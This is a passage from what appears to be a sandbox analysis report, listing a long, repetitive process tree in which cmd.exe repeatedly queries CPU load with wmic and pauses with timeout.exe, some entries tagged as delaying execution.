    timeout /t 1
    3⤵
    PID:3360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1604
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4636
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3856
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:660
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4444
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2804
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2456
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3564
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2428
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3516
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2412
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4712
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3268
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4232
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4332
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1064
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4876
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3528
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3356
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4624
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:396
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3792
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:972
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3604
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3936
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1108
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2440
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4416
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:800
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2556
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:684
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1184
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2840
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:880
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1912
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2836
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2208
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4176
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1756
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4708
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3848
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2624
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2140
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:824
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1456
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2124
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3192
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4380
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2296
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:196
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:604
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:168
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3168
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3368
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1316
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3720
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:516
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:348
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4300
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3564
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3200
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2228
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:600
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4572
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2224
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3376
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4904
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3460
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4016
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4704
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4312
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3512
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3556
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4724
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4620
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2220
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:428
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4844
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:952
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4044
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:528
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3844
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5048
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1020
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1632
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1216
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2856
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1448
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2152
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4968
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3656
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4324
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:5004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4148
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1996
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1608
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:440
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2020
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4056
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2380
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3652
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2564
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2284
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2296
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2232
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4860
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4972
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3168
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4912
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1316
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2212
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3720
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3880
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:348
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2656
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1596
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2580
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1420
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1696
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2228
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4352
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2072
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4984
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3140
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:360
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3460
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3480
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4704
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4204
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3512
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3932
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4464
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3604
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3620
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4468
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4052
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3320
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:236
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1168
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:704
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4524
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1184
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:64
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4020
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1704
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1448
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4700
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4244
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1880
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3988
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4816
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3608
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1456
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1248
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2932
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2004
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3192
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1332
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:96
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3032
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2000
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1604
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1424
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3856
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1348
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1244
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3944
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2740
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5108
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4908
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2684
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
